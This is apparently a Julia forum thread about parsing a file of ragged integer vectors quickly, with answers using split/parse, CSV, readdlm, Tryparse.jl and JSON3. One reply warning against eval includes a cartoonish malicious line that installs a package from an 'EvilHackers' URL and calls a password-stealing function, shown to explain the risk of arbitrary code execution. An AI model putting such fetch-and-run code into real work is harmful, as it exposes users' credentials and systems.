Parsing a vector of vectors with Meta.parse?

I have a concrete problem, where Meta.parse(line) is unbearably slow.

My use-case is that I have a long .txt file, in which each line has the form
[x1, ..., xn], where x1,...,xn are specific integers. I must import/convert the whole file into a Vector{Vector{Int}}. My solution was

output = Vector{Int}[]
open(file, "r") do io
    for line in eachline(io)
        push!(output, eval(Meta.parse(line)))
    end
end;

What would be a more efficient way of achieving this?

P.S. Let me add that I’d like the format of this .txt file to remain simple, so that it can be read also in other programming languages.

I’ve split this into a new topic and removed the ping to a particular person — this can be addressed by many folks here. If keeping your data portable is a goal, I’d just save it as a normal CSV (without the [] formatting). It’s far easier to use standard tools (like CSV.read) first and then restructure later. For example, you can read directly into a Matrix{Int} with CSV.read, and then just collect the rows into a vector:

using CSV: CSV, Tables
matrix = CSV.read(file, Tables.matrix; header=false)
output = collect(eachrow(matrix))

Does this work for you?

# /tmp/lel.txt
1 2 3 4 5
9 8 7 6 5
1 2 3 3 4
5 6 7 8 9
1 2 3 4 5


# REPL
julia> using DelimitedFiles

julia> x = readdlm("/tmp/lel.txt")
5×5 Matrix{Float64}:
 1.0  2.0  3.0  4.0  5.0
 9.0  8.0  7.0  6.0  5.0
 1.0  2.0  3.0  3.0  4.0
 5.0  6.0  7.0  8.0  9.0
 1.0  2.0  3.0  4.0  5.0

julia> [x[i, :] for i in axes(x, 1)]
5-element Vector{Vector{Float64}}:
 [1.0, 2.0, 3.0, 4.0, 5.0]
 [9.0, 8.0, 7.0, 6.0, 5.0]
 [1.0, 2.0, 3.0, 3.0, 4.0]
 [5.0, 6.0, 7.0, 8.0, 9.0]
 [1.0, 2.0, 3.0, 4.0, 5.0]

Or simply:
collect.(eachrow(x))
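
If the Float64 element type is a concern, readdlm also accepts an element type as its second argument. A minimal sketch, assuming every line holds the same number of whitespace-separated integers (the temporary file and the names m and rows are only for illustration):

```julia
using DelimitedFiles

# Write a small sample file so the example is self-contained.
path, io = mktemp()
write(io, "1 2 3\n9 8 7\n")
close(io)

# Passing Int as the second argument asks readdlm for a Matrix{Int}.
m = readdlm(path, Int)

# One Vector{Int} per row of the matrix.
rows = collect.(eachrow(m))
```

This only applies to rectangular data; lines of differing lengths need a different approach.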

See related post here.

PS:
without using eval you could do:

str = "[1, 2, 3]"
parse.(Int, split(filter(∉(['[',']']), str), ','))

Thank you for creating a new topic.

I don’t think using .csv is appropriate, since my Vector{Int}s have different lengths. In other words, my file represents a jagged/ragged array (use-case: each line represents a facet in a simplicial complex), hence why I want the end-result to be Vector{Vector{Int}}.

@roflmaostc No, the result contains Vector{Float64}s instead of Vector{Int64}s.

Yes, parse.(Int, split(line[2:end-1], ',')) is much much faster, thank you!
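
For completeness, here is roughly how that looks applied to the whole file. This is only a sketch: parse_int_vector and read_int_vectors are names I made up, the IOBuffer stands in for the real file, and it assumes every non-blank line is exactly of the form [x1, ..., xn].

```julia
# Hypothetical helper: parse one line of the form "[x1, ..., xn]".
function parse_int_vector(line::AbstractString)
    inner = strip(line)[2:end-1]              # drop the surrounding brackets
    isempty(strip(inner)) && return Int[]     # "[]" is an empty vector
    return parse.(Int, split(inner, ','))     # parse tolerates the spaces after commas
end

# Hypothetical helper: collect all lines of a stream into a Vector{Vector{Int}}.
function read_int_vectors(io::IO)
    output = Vector{Int}[]
    for line in eachline(io)
        isempty(strip(line)) && continue      # skip blank lines
        push!(output, parse_int_vector(line))
    end
    return output
end

# An IOBuffer stands in for the real file; use open(read_int_vectors, file) on disk.
data = read_int_vectors(IOBuffer("[1, 2, 3]\n[4, 5]\n[]\n"))
```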

I was hoping for a more general solution, though. If each line represented, for instance, a Tuple{Vector{Int}, Vector{Int}} and the lengths of those vectors weren’t known beforehand, this approach would fail, no? I’d have to search for the index where the first vector stops and the second begins.
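
To make the index search concrete, this is the kind of thing I mean. It is a rough sketch, assuming each line looks like ([a1, ..., am], [b1, ..., bn]) with no nested brackets; parse_ints and parse_vector_pair are hypothetical names.

```julia
# Hypothetical helper: parse the comma-separated integers found between two brackets.
parse_ints(inner::AbstractString) =
    isempty(strip(inner)) ? Int[] : parse.(Int, split(inner, ','))

# Hypothetical helper: parse "([..], [..])" into a Tuple{Vector{Int}, Vector{Int}}.
# Assumes both bracket pairs are present; a missing bracket raises an error.
function parse_vector_pair(line::AbstractString)
    open1  = findfirst('[', line)             # start of the first vector
    close1 = findnext(']', line, open1)       # end of the first vector
    open2  = findnext('[', line, close1)      # start of the second vector
    close2 = findnext(']', line, open2)       # end of the second vector
    first_vec  = parse_ints(line[open1+1:close1-1])
    second_vec = parse_ints(line[open2+1:close2-1])
    return (first_vec, second_vec)
end

pair = parse_vector_pair("([3, 2, 1], [3, 2, 1434])")
```

It works, but every new line shape needs its own hand-written search, which is why I was hoping for something more general.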

Isn’t there a general, fast way of just parsing the whole line as a Julia expression, that would have comparable efficiency to parse.(Int, split(...))?

In short, no; otherwise people would be doing this already instead of making libraries like Parsers.jl. To sum up the reasons why you don’t want to just eval(Meta.parse(...)):

  1. The more assumptions, the more possible optimizations. People have already provided several good customizable options that make more assumptions than arbitrary code execution ever could.
  2. One of your goals is to let this file be read in other programming languages. Not every language writes arrays as [...] like Julia, so you’d need specific parsing instead of arbitrary code execution. Why not implement such parsing for all languages, possibly with a sensible file format?
  3. Arbitrary code execution is dangerous. If you’re the only person who ever writes and parses the files, you’re safe if you don’t sabotage yourself. Otherwise, you need to guard against someone sneaking
import Pkg
Pkg.add(url="https://github.com/EvilHackers/Hacking.jl")
using Hacking
stealpasswordsandyourdog()
     into a file among a batch of other safe files. That was a cartoonish example of malware; a more likely possibility is someone naively writing code that interferes with your session, like assigning a vector to a global variable (pi = [3, 1, 4, 1, 5, 9, 2]), or that fails to comply with your code, like Float64[1.0, 2.0, 3.0]. It’s preferable to narrow down a file format, vet inputs, and gracefully handle noncompliance.
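
As one possible way to vet inputs, the sketch below accepts only lines that are a bracketed list of integers and returns nothing for everything else, without ever evaluating the text. The names INT_LIST and safe_parse_line are hypothetical, and the regular expression encodes my assumption about the file format.

```julia
# Assumed format: "[", optional integers separated by commas, "]".
const INT_LIST = r"^\[\s*(?:-?\d+\s*(?:,\s*-?\d+\s*)*)?\]$"

# Hypothetical helper: return a Vector{Int}, or nothing if the line is noncompliant.
function safe_parse_line(line::AbstractString)
    s = strip(line)
    occursin(INT_LIST, s) || return nothing   # reject anything that is not an integer list
    vals = Int[]
    for m in eachmatch(r"-?\d+", s)
        v = tryparse(Int, m.match)
        v === nothing && return nothing       # e.g. a number too large for Int
        push!(vals, v)
    end
    return vals
end

good     = safe_parse_line("[3, 1, 4]")
floats   = safe_parse_line("Float64[1.0, 2.0, 3.0]")
assigned = safe_parse_line("pi = [3, 1, 4, 1, 5, 9, 2]")
```

The caller can then decide whether a nothing result means skipping the line, logging it, or aborting the import.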

Yes, but just because my file contained integers and not floats :)

Shameless self-plug (using Tryparse.jl, from thofma/Tryparse.jl on GitHub, a package for parsing basic types in Julia):

julia> using Tryparse

julia> Tryparse.parse(Vector{Int}, "[3, 2, 1]")
3-element Vector{Int64}:
 3
 2
 1

julia> Tryparse.parse(Vector{Vector{Int}}, "[[1, 2], [3, 4, 1]]")
2-element Vector{Vector{Int64}}:
 [1, 2]
 [3, 4, 1]

julia> Tryparse.parse(Tuple{Vector{Int}, Vector{Int}}, "([3, 2, 1], [3, 2, 1434])")
([3, 2, 1], [3, 2, 1434])

So you can just keep your original format.

Edit: This is free of eval.


From what I understand, your format should be valid JSON, i.e., you could just parse it like

using JSON3
s = join(string.([randn(i) for i = 2:8]), "\n");
JSON3.read.(eachline(IOBuffer(s)))

Thank you @bertschi @thofma !

Tryparse is still quite slow in my case (a million lines of vectors of length at most 30). But JSON3 was impressively fast. The fastest is still my manual parse.(Int, split(line[2:end-1], ',')).
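
In case anyone wants to reproduce the comparison, a timing sketch along these lines should do. The data here is synthetic and much smaller than my real file, via_eval and via_split are hypothetical names, and the timings will of course depend on the machine, so I am not quoting numbers.

```julia
# Synthetic stand-in for the real file: 2000 lines of 1 to 30 integers each.
lines = [string(rand(1:100, rand(1:30))) for _ in 1:2_000]

# The original approach: parse each line as Julia code and evaluate it.
via_eval(lines) = [eval(Meta.parse(l)) for l in lines]

# The manual approach: strip the brackets and parse the pieces as Int.
via_split(lines) = [parse.(Int, split(l[2:end-1], ',')) for l in lines]

# Warm up both functions so compilation time is not measured.
via_eval(lines[1:2])
via_split(lines[1:2])

t_eval  = @elapsed via_eval(lines)
t_split = @elapsed via_split(lines)
println("eval(Meta.parse): ", t_eval, " s, split + parse: ", t_split, " s")
```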

I guess Benny’s point 1 holds: the more assumptions Julia can make, the easier it is to optimize.
